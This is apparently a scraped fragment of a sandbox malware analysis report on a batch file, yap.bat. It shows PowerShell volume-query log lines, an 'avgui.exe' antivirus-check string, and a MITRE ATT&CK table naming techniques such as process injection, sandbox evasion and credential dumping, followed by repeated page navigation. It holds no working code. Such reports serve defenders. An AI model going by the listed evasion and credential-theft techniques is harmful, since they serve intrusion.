Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation

Source: find.exe, 0000000C.00000002.1242592416.00000188EF570000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: avgui.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
yap.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yap.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
yap.bat